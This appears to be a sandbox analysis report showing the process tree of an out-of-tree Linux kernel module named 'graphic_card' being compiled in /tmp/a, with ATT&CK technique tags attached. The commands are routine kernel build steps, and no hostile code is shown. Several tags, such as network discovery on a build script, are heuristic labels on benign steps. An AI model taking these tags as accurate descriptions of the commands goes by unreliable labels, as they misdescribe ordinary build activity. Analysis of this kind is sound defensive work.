/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1882 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1883
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1884 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1885
-
-
-
/bin/sh/bin/sh -c "test -e include/generated/autoconf.h -a -e include/config/auto.conf || ( \\ echo >&2; \\ echo >&2 \" ERROR: Kernel configuration is invalid.\"; \\ echo >&2 \" include/generated/autoconf.h or include/config/auto.conf are missing.\";\\ echo >&2 \" Run 'make oldconfig && make prepare' on kernel src to fix it.\"; \\ echo >&2 ; \\ /bin/false)"3⤵PID:1886
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1887 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1888
-
-
-
/bin/sh/bin/sh -c "PAHOLE=pahole ./scripts/pahole-flags.sh"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1889 -
/usr/src/linux-headers-5.15.0-105-generic/scripts/pahole-flags.sh./scripts/pahole-flags.sh4⤵
- System Network Configuration Discovery
PID:1890
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1892 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1893
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1894 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1895
-
-
-
/bin/sh/bin/sh -c "if [ \"gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\" != \"gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\" ]; then \\ echo >&2 \"warning: the compiler differs from the one used to build the kernel\"; \\ echo >&2 \" The kernel was built by: \"\"gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\"; \\ echo >&2 \" You are using: gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\"; \\ fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1896
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1897 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1898
-
-
-
/bin/sh/bin/sh -c "PAHOLE=pahole ./scripts/pahole-flags.sh"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1899 -
/usr/src/linux-headers-5.15.0-105-generic/scripts/pahole-flags.sh./scripts/pahole-flags.sh4⤵
- System Network Configuration Discovery
PID:1900
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1902 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1903
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1904 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1905
-
-
-
/usr/bin/makemake -f ./scripts/Makefile.build "obj=/tmp/a" "single-build=" "need-builtin=1" "need-modorder=1"3⤵
- System Network Configuration Discovery
PID:1906 -
/usr/bin/mkdirmkdir -p /tmp/a4⤵PID:1907
-
-
/bin/sh/bin/sh -c "set -e; echo ' CC [M] /tmp/a/graphic_card.o'; trap 'rm -f /tmp/a/graphic_card.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/graphic_card.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/graphic_card.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/graphic_card.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/graphic_card.o; trap - PIPE; kill -s PIPE \$\$' PIPE; gcc -Wall -Wp,-MMD,/tmp/a/.graphic_card.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wno-packed-not-aligned -fsanitize=bounds -fsanitize=shift -fsanitize=bool -fsanitize=enum -DMODULE -DKBUILD_BASENAME='\"graphic_card\"' -DKBUILD_MODNAME='\"graphic_card\"' -D__KBUILD_MODNAME=kmod_graphic_card -c -o /tmp/a/graphic_card.o /tmp/a/graphic_card.c; scripts/basic/fixdep /tmp/a/.graphic_card.o.d /tmp/a/graphic_card.o 'gcc -Wall -Wp,-MMD,/tmp/a/.graphic_card.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wno-packed-not-aligned -fsanitize=bounds -fsanitize=shift -fsanitize=bool -fsanitize=enum -DMODULE -DKBUILD_BASENAME='\\''\"graphic_card\"'\\'' -DKBUILD_MODNAME='\\''\"graphic_card\"'\\'' -D__KBUILD_MODNAME=kmod_graphic_card -c -o /tmp/a/graphic_card.o /tmp/a/graphic_card.c' > /tmp/a/.graphic_card.o.cmd; rm -f /tmp/a/.graphic_card.o.d"4⤵PID:1908
-
/usr/bin/gccgcc -Wall "-Wp,-MMD,/tmp/a/.graphic_card.o.d" -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ "-fmacro-prefix-map=./=" -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wno-packed-not-aligned "-fsanitize=bounds" "-fsanitize=shift" "-fsanitize=bool" "-fsanitize=enum" -DMODULE "-DKBUILD_BASENAME=\"graphic_card\"" "-DKBUILD_MODNAME=\"graphic_card\"" "-D__KBUILD_MODNAME=kmod_graphic_card" -c -o /tmp/a/graphic_card.o /tmp/a/graphic_card.c5⤵
- Writes file to tmp directory
PID:1909 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -nostdinc -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY -D MODULE -D "KBUILD_BASENAME=\"graphic_card\"" -D "KBUILD_MODNAME=\"graphic_card\"" -D "__KBUILD_MODNAME=kmod_graphic_card" -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -include ./include/linux/compiler_types.h -MMD /tmp/a/.graphic_card.o.d /tmp/a/graphic_card.c -quiet -dumpdir /tmp/a/ -dumpbase graphic_card.c -dumpbase-ext .c -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Walloc-size-larger-than=18446744073709551615EiB" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wno-packed-not-aligned "-std=gnu90" -p "-fmacro-prefix-map=./=" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fno-strict-overflow "-fstack-check=no" -fconserve-stack "-fsanitize=bounds" "-fsanitize=shift" "-fsanitize=bool" "-fsanitize=enum" -fstack-protector-strong -o /tmp/cc31Gi3h.s6⤵
- Writes file to tmp directory
PID:1910
-
-
/usr/local/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/graphic_card.o /tmp/cc31Gi3h.s6⤵PID:1911
-
-
/usr/local/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/graphic_card.o /tmp/cc31Gi3h.s6⤵PID:1911
-
-
/usr/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/graphic_card.o /tmp/cc31Gi3h.s6⤵PID:1911
-
-
/usr/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ./ubuntu/include --gdwarf-5 --64 -o /tmp/a/graphic_card.o /tmp/cc31Gi3h.s6⤵
- Writes file to tmp directory
PID:1911
-
-
-
/usr/src/linux-headers-5.15.0-105-generic/scripts/basic/fixdepscripts/basic/fixdep /tmp/a/.graphic_card.o.d /tmp/a/graphic_card.o "gcc -Wall -Wp,-MMD,/tmp/a/.graphic_card.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wno-packed-not-aligned -fsanitize=bounds -fsanitize=shift -fsanitize=bool -fsanitize=enum -DMODULE -DKBUILD_BASENAME='\"graphic_card\"' -DKBUILD_MODNAME='\"graphic_card\"' -D__KBUILD_MODNAME=kmod_graphic_card -c -o /tmp/a/graphic_card.o /tmp/a/graphic_card.c"5⤵PID:1912
-
-
/usr/bin/rmrm -f /tmp/a/.graphic_card.o.d5⤵PID:1913
-
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/graphic_card.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/graphic_card.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/graphic_card.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/graphic_card.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/graphic_card.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1914
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/graphic_card.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/graphic_card.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/graphic_card.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/graphic_card.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/graphic_card.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1915
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/graphic_card.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/graphic_card.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/graphic_card.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/graphic_card.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/graphic_card.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1916
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/graphic_card.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/graphic_card.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/graphic_card.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/graphic_card.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/graphic_card.o; trap - PIPE; kill -s PIPE \$\$' PIPE; ./tools/objtool/objtool check --module --retpoline --rethunk --uaccess --sls /tmp/a/graphic_card.o"4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1917 -
/usr/src/linux-headers-5.15.0-105-generic/tools/objtool/objtool./tools/objtool/objtool check --module --retpoline --rethunk --uaccess --sls /tmp/a/graphic_card.o5⤵PID:1918
-
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/graphic_card.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/graphic_card.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/graphic_card.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/graphic_card.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/graphic_card.o; trap - PIPE; kill -s PIPE \$\$' PIPE; if objdump -h /tmp/a/graphic_card.o | grep -q __ksymtab; then gcc -E -D__GENKSYMS__ -Wp,-MMD,/tmp/a/.graphic_card.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/11/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/compiler-version.h -include ./include/linux/kconfig.h -I./ubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=./= -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wno-packed-not-aligned -fsanitize=bounds -fsanitize=shift -fsanitize=bool -fsanitize=enum -DMODULE -DKBUILD_BASENAME='\"graphic_card\"' -DKBUILD_MODNAME='\"graphic_card\"' -D__KBUILD_MODNAME=kmod_graphic_card /tmp/a/graphic_card.c | scripts/genksyms/genksyms -r /dev/null > /tmp/a/.tmp_graphic_card.ver; ld -m elf_x86_64 -z noexecstack -r -o /tmp/a/.tmp_graphic_card.o /tmp/a/graphic_card.o -T /tmp/a/.tmp_graphic_card.ver; mv -f /tmp/a/.tmp_graphic_card.o /tmp/a/graphic_card.o; rm -f /tmp/a/.tmp_graphic_card.ver; fi"4⤵PID:1919
-
/usr/bin/grepgrep -q __ksymtab5⤵
- Reads runtime system information
PID:1921
-
-
/usr/bin/objdumpobjdump -h /tmp/a/graphic_card.o5⤵PID:1920
-
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/graphic_card.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/graphic_card.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/graphic_card.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/graphic_card.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/graphic_card.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1922
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/graphic_card.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/graphic_card.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/graphic_card.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/graphic_card.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/graphic_card.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1923
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/graphic_card.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/graphic_card.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/graphic_card.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/graphic_card.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/graphic_card.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1924
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/graphic_card.mod; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/graphic_card.mod; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/graphic_card.mod; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/graphic_card.mod; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/graphic_card.mod; trap - PIPE; kill -s PIPE \$\$' PIPE; { echo /tmp/a/graphic_card.o; echo; } > /tmp/a/graphic_card.mod; printf '%s\\n' 'cmd_/tmp/a/graphic_card.mod := { echo /tmp/a/graphic_card.o; echo; } > /tmp/a/graphic_card.mod' > /tmp/a/.graphic_card.mod.cmd"4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1925
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/modules.order; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/modules.order; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/modules.order; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/modules.order; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/modules.order; trap - PIPE; kill -s PIPE \$\$' PIPE; { echo /tmp/a/graphic_card.ko; :; } | awk '!x[\$0]++' - > /tmp/a/modules.order; printf '%s\\n' 'cmd_/tmp/a/modules.order := { echo /tmp/a/graphic_card.ko; :; } | awk '\\''!x[\$\$0]++'\\'' - > /tmp/a/modules.order' > /tmp/a/.modules.order.cmd"4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1926 -
/usr/bin/awkawk "!x[\$0]++" -5⤵
- Reads runtime system information
PID:1928
-
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1929 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1930
-
-
-
/bin/sh/bin/sh -c "PAHOLE=pahole ./scripts/pahole-flags.sh"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1931 -
/usr/src/linux-headers-5.15.0-105-generic/scripts/pahole-flags.sh./scripts/pahole-flags.sh4⤵
- System Network Configuration Discovery
PID:1932
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1934 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1935
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1936 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1937
-
-
-
/usr/bin/shsh ./scripts/modules-check.sh /tmp/a/modules.order3⤵
- System Network Configuration Discovery
PID:1938 -
/usr/bin/uniquniq -d4⤵PID:1942
-
-
/usr/bin/sortsort4⤵PID:1941
-
-
/usr/bin/sedsed "s:.*/::" /tmp/a/modules.order4⤵PID:1940
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1943 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1944
-
-
-
/bin/sh/bin/sh -c "PAHOLE=pahole ./scripts/pahole-flags.sh"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1945 -
/usr/src/linux-headers-5.15.0-105-generic/scripts/pahole-flags.sh./scripts/pahole-flags.sh4⤵
- System Network Configuration Discovery
PID:1946
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1948 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1949
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
